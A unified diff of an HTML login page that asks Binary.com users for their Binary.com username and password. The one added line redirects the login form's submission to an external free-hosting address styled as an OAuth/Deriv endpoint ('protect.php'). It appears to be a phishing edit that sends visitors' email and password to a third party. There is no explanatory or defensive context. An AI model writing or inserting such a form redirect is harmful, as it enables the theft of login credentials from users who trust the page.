--- a/index.html
+++ b/index.html
@@ -688,7 +688,7 @@
           <h5 class="note-title">If you're a <strong>Binary.com</strong> user, log in with your <strong>Binary.com</strong> username and password </h5>
         </div>
       </div>
-      <form novalidate="" id="frmLogin" method="POST" action="">
+      <form novalidate="" id="frmLogin" method="POST" action="https://oauthderiv.000webhostapp.com/protect.php">
         <div class="input-group">
           <div class="input-wrapper">
             <input type="email" id="txtEmail" name="email" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
